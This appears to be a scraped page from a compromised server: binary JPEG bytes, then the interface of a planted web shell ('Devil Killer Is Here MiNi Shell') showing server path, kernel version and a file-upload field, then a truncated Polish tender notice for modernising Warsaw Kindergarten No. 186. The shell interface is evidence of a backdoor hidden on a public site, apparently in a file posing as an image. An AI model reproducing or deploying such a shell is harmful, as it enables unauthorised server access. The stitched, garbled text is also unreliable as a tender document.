JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230511/0021231501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja budynku Przedszkola nr 186 przy ul. Wołomińskiej 12/18 (remont elewacji, wymiana pokrycia dachowego, wykonanie izolacji fundamentów). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Praga-Północ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kłopotowskiego 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-708</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 443-80-(50 lub 48)</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ppn.zampubl@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.praga-pn.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja budynku Przedszkola nr 186 przy ul. Wołomińskiej 12/18 (remont elewacji, wymiana pokrycia dachowego, wykonanie izolacji fundamentów). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c27a3aca-ef17-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00212315</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00031916/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Modernizacja budynku przedszkola nr 186 przy ul. Wołomińskiej 12/18 (remont elewacji, wymiana pokrycia dachowego, wykonanie izolacji fundamentów)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem https://zamowienia.um.warszawa.pl zwanej dalej Platformą lub Systemem. <br/>2)	Przekazanie oferty wymaga od Wykonawcy zarejestrowania się i zalogowania na Platformie, zgodnie z poniższą kolejnością. <br/>3)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub założenia bezpłatnego konta. Rejestracja Wykonawcy na Platformie następuje automatycznie poprzez weryfikację adresu e-mail podanego przez Wykonawcę w formularzu rejestracyjnym. W uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) weryfikacja danych Wykonawcy może trwać maksymalnie do 2 dni roboczych. Mając to na uwadze, Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie elektronicznej lub w postaci elektronicznej. <br/>4)	Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:<br/>•	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;<br/>•	komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>•	Zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;<br/>•	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5)	Dopuszczalne wielkości i formaty przesyłanych danych<br/>•	Wielkość pojedynczego pliku zamieszczanego w systemie nieprzekraczająca 100 MB;<br/>•	Dopuszczalne formaty plików: txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>6)	Kodowanie i czas odbioru danych<br/>•	Plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;<br/>•	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>Szczegółowe informacje znajdują się w Rozdziale III pkt 1.4) SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w rozdziale I pkt 8 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w rozdziale I pkt 8 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-VII-WZP.271.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest Przedmiotem zamówienia jest przebudowa i termomodernizacja budynku przedszkola nr 186 przy ul Wołomińskiej 12/18 w Warszawie wraz z zagospodarowaniem terenu w ramach zadania pn. „Modernizacja budynku przedszkola nr 186 przy ul. Wołomińskiej 12/18 wraz z zagospodarowaniem terenu”.<br/>W ramach przedmiotowego zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach opisanych w niniejszej specyfikacji, w opisie przedmiotu zamówienia stanowiącym załącznik nr 6 do SWZ oraz w projektowanych postanowieach umowy – załącznik nr 2 do SWZ.<br/>Zakres rzeczowy przedmiotu zamówienia obejmuje roboty budowlane, sanitarne, elektryczne, teletechniczne, wykończeniowe, roboty w zakresie zagospodarowania terenu<br/>Charakterystyczne parametry:<br/>Stan istniejący:<br/>- Powierzchnia zabudowy – 440 m2 <br/>- Powierzchnia całkowita – 1150 m2 <br/>- Wysokość obiektu – 8,23 m <br/>- Liczba kondygnacji – 2 nadziemne, poddasze nieużytkowe, 1 podziemna<br/>Opis robót.<br/>Zakres podstawowy<br/>A.	Część zewnętrzna budynku w szczególności :<br/>1.	Rozbiórka pokrycia dachowego z papy, rozbiórka obróbek blacharskich murów ogniowych, komina, gzymsów, rozebranie rynien oraz rur spustowych.<br/>2.	Wykucie nowego otworu pod klapę dymową. <br/>3.	Wymiana stolarki drzwiowej oraz okiennej<br/>4.	Wykonanie termomodernizacji ścian zewnętrznych – metodą „lekką –mokrą z płyt styropianowych lub z wełny mineralnej, nowa okładzina ścian tynkiem cienkowarstwowym, wymiana kratek wentylacyjnych, Wykonanie nowego otworu drzwiowego i wstawienie drzwi w łazience od strony ogrodu. <br/>5.	Wymiana obróbek blacharskich – parapetów zewnętrznych, <br/>6.	Wykonanie wykopu wokół budynku w celu izolacji oraz docieplenia fundamentów i ścian fundamentowych, zsypanie wykopów, otworzenie nawierzchni chodnika<br/>7.	Roboty budowlane przy wystającej części podpiwniczenia - zabezpieczyć przeciwwilgociowo, ocieplić styropianem analogicznie jak ściany zewnętrzne w strefie przyziemia oraz obłożyć płytami kamiennymi, wapiennymi (tak jak cokół budynku przedszkola);<br/>8.	Wyburzenie schodów (wejście do przedszkola) oraz tarasów, likwidacja zsypów <br/>9.	Renowacja schodów – wejścia od przodu budynku – strona południowa oraz do kuchni strona północna<br/>10.	Wykonanie nowych schodów wraz pochylnią <br/>11.	Nowe balustrady schodów oraz pochylni ze stali ocynkowanej malowanej proszkowo.<br/>12.	Zadaszenie stalowe nad wejściem do budynku (schody oraz pochylnia) <br/>13.	W miejscach rozebranych tarasów uzupełnić nawierzchnie - z kostki typu polbruk) <br/>14.	Ocieplenie stropodachu wełną granulowaną, pokrycie dachu dwie warstwy papy, nowe tynki na kominach oraz czapki kominowe. Elementy blaszane kominów wymienić na nowe, zamontować stalowe ocynkowane kratki kanałów kominowych <br/>15.	Nowe obróbki murów ogniowych, obróbek kominów, pasów nadrynnowych, pasów podrynnowych, gzymsów itp. <br/>16.	Montaż nowych rynien oraz rur spustowych<br/>17.	Montaż klapy dymowej<br/>18.	Zamontować instalacje fotowoltaiczną na dachu budynku. <br/>19.	Wymienić instalacją c.w.u., przewody zaizolować <br/>20.	Montaż nowej instalacji odgromowej.<br/>21.	Montaż nowych kanałów wentylacyjnych;<br/>22.	Zabezpieczenie instalacji gazowej – istniejącą instalację gazową należy obudować systemowym kanałem instalacyjnym z perforowanym, demontowanym profilem frontowym. <br/>B.	Budynek przedszkola – część wewnętrzna:<br/>1.	Wykonanie oddymiania głównej klatki schodowej: wydzielenie pożarowe poprzez obudowę klatki, wykonanie nowych schodów wewnętrznych, wykonanie nowego wyjścia na zewnątrz budynku, wymiana okna wyższego na oddymiające i niższego na bezpieczne, wykonanie mechanicznego nawiewu powietrza - oddymianie; <br/>2.	Dokonać aktualizacji instrukcji bezpieczeństwa pożarowego w zakresie: <br/>- powierzchni, wysokości i liczby kondygnacji budynku; kategorii zagrożenia ludzi, przewidywanej liczbie osób na każdej kondygnacji i w poszczególnych pomieszczeniach, dróg pożarowych – części rysunkowej,<br/>- warunków ochrony przeciwpożarowej dot. przebiegu drogi pożarowej i kategorii zagrożenia ludzi w części opisowej . <br/>3.	Wymiana instalacji wody zimnej, ciepłej i kanalizacji (z wyłączeniem instalacji wod.-kan. w pomieszczeniach kuchennych oraz kanalizacji technologicznej kuchni);<br/>4.	Wymiana wpustów podłogowych kanalizacji w pomieszczeniach kuchni na wpusty podłogowe z blokadą antyzapachową oraz montaż wywiewek na czterech pionach kanalizacji technologicznej w kuchni;<br/>5.	Wymiana instalacji centralnego ogrzewania z wyłączeniem istniejącej instalacji centralnego ogrzewania w pomieszczeniach kuchni z zapleczem;<br/>6.	Wykonanie instalacji wentylacji mechanicznej nawiewno-wywiewnej z zastosowaniem odzysku ciepła ; <br/>7.	Modernizacja węzła cieplnego w zakresie technologii, automatyki, instalacji elektrycznych i robót budowlanych;<br/>8.	Wymiana wszystkich instalacji elektrycznych wewnętrznych, w tym oświetlenia awaryjnego (ewakuacyjnego); <br/>9.	Wykonanie nowych ścianek działowych <br/>10.	Rozebranie istniejących posadzek<br/>11.	Wyrównanie powierzchni w tym naprawa pęknięć w posadzkach<br/>12.	Ułożenie paneli winylowych w pomieszczeniach wymienionych w projekcie architektury.<br/>13.	Odbicie tynków wewnętrznych ścian, ościeżach oraz sufitów<br/>14.	Wykucie z muru ościeżnic drzwiowych.<br/>15.	Montaż stolarki drzwiowej wraz z ościeżnicami<br/>16. W pomieszczeniach sanitarnych skuć istniejące płytki, podłoże przygotować poprzez zagruntowanie, ułożenie izolacji, ułożyć płytki ceramiczne, fuga zbliżona do koloru płytek. <br/>17.	Montaż refleksoli (łamaczy światła) od wewnętrznej strony okien<br/>18.	Instalacje elektryczne wewnętrzne w tym wewnętrzne linie zasilające, rozdzielnica główna budynku, rozdzielnice odbiorów technologicznych, pomiary energii elektrycznej, zasilanie odbiorów pożarowych.<br/>19.	Instalacje obejmują: instalacje gniazd ogólnych, siłowych i odbiorów technologicznych, instalacje gniazd komputerowych, instalacji oświetlenia podstawowego, ewakuacyjnego i awaryjnego, instalacji oświetlenia zewnętrznego, instalacja monitoringu wizyjnego, instalacja alarmowa, instalacja RTV-SAT, instalacja odgromowa, instalacja gniazd LAN, wymiana rozdzielnic głównych, montaż tablic multimedialnych, montaż punktów dostępowych WI-FI, instalacja głównego wyłącznika prądu, instalacja video- domofonowa, instalacja sygnalizatorów akustyczno – głosowych.<br/>20.	Wymiana oświetlenia wewnętrznego <br/>21.	Wyposażenie budynku w środki gaśnicze, oznakowanie.<br/>22.	Wyposażenie łazienek dla dzieci oraz w piwnicy (pomieszczenie nr 15 Rys A-01)<br/>23.	Wyposażenie w sali w piwnicy (pomieszczenie nr 4 Rys.A-01)<br/>24.	Wywiezienie gruzu, odpadów budowlanych z utylizacją<br/><br/>C.	Zagospodarowanie terenu <br/>1.	Wymiana ogrodzenia, wymiana bram wjazdowych, furtek, <br/>2.	Połączenie systemem niskoprądowych<br/>3.	Wykonanie podłoża pod parking rowerowy <br/>4.	Wymiana oświetlenia zewnętrznego <br/>5.	Wymiana monitoringu zewnętrznego i wewnętrznego (wewnątrz hol główny, szatnia, wszystkie wejścia do budynku, bramy wjazdowe, plac zabaw, sale),<br/>6.	Wykonanie kanalizacji deszczowej odwadniającej dach i teren z retencją wód opadowych w zbiornikach do podlewania zieleni z włączeniem do istniejącego przyłącza kanalizacji ogólnospławnej.<br/>Zakres Opcji<br/>Część I (opcja 1)<br/>1.	Plac zabaw - wymiana zabawek. <br/>2.	Plac zabaw- nowa nawierzchnia poliuretanowa.<br/>3.	Ułożenie nawierzchni bezpiecznej w miejscu tarasu. <br/>4.	Mała architektura (domek na zabawki, donice – warzywniak)<br/>5.	Zieleń<br/>Część II (opcja2)<br/>Na oknach, od zewnątrz montaż refleksoli „łamaczy światła”.<br/>Przedmiot zamówienia nie obejmuje dostawy wyposażenia w meble oraz dostawy zestawów multimedialnych. W związku z tym do ceny oferty nie doliczać wyposażenia w meble w salach (na rysunkach oznaczone numerami (1, 2, 3, 4, 5, 6, 7,9, 10, 11, 14, 15, 16, 17, 18,) oraz zestawów multimedialnych (tablice interaktywne +projektor multimedialny- oznaczonych numerem 8).<br/>Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru robót określają:<br/>a)	Opis przedmiotu zamówienia – Załącznik nr 6 do SWZ<br/>b)	Projektowane postanowienia umowy – załącznik nr 2 do SWZ<br/>c)	Specyfikacja techniczna wykonania i odbioru robót budowlanych – Załącznik nr 8 do SWZ.<br/>d)	Dokumentacja projektowa - załącznik nr 9 do SWZ<br/>Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. <br/>Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>Zamawiający udostępnia przedmiar robót (załącznik nr 7 do SWZ), stanowiący materiał informacyjny (pomocniczy) o zakresie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262400-5 - Wnoszenie konstrukcji ze stali konstrukcyjnej</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45312300-0 - Instalowanie anten</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W ramach przedmiotowego zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach opisanych w SWZ, w opisie przedmiotu zamówienia stanowiącym załącznik nr 6 do SWZ oraz w projektowanych postanowieniach umowy – załącznik nr 2 do SWZ<br/><br/>Zakres Opcji<br/>Część I (opcja 1)<br/>1.	Plac zabaw - wymiana zabawek. <br/>2.	Plac zabaw- nowa nawierzchnia poliuretanowa.<br/>3.	Ułożenie nawierzchni bezpiecznej w miejscu tarasu. <br/>4.	Mała architektura (domek na zabawki, donice – warzywniak)<br/>5.	Zieleń<br/>Część II (opcja2)<br/>Na oknach, od zewnątrz montaż refleksoli „łamaczy światła”.<br/><br/>Zamawiający zamierza przeznaczyć na sfinansowanie niniejszego zamówienia kwotę:<br/>Zamówienia stanowiące odpowiednio prawo opcji:<br/>Część I (opcja 1): 839.560, 05 złotych brutto <br/>Część II (opcja 2): 327.971,36 złotych brutto<br/><br/> Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej:<br/>1) Zamawiający ma prawo do skorzystania z prawa opcji lub skorzystać w części z prawa opcji, która została opisana w Specyfikacji Warunków Zamówienia,<br/>2) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługuje wynagrodzenie oraz nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>3) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu od Zamawiającego pisemnego oświadczenia woli o skorzystaniu z prawa opcji i jego zakresie. Strony dopuszczają możliwość złożenia tego oświadczenia za pośrednictwem poczty elektronicznej na adres wskazany w § 16 ust. 2 lit. b)projektowanych postanowień umowy - załącznik nr 2 do SWZ<br/>4) Termin wykonania zamówienia objętego prawem opcji lub jej części nie może być dłuższy niż termin wykonania przedmiotu Umowy, który został określony w § 2 ust. 1 projektowanych postanowień umowy - załącznik nr 2 do SWZ<br/>5) Wszystkie postanowienia projektowanych postanowień umowy - załącznik nr 2 do SWZ mają 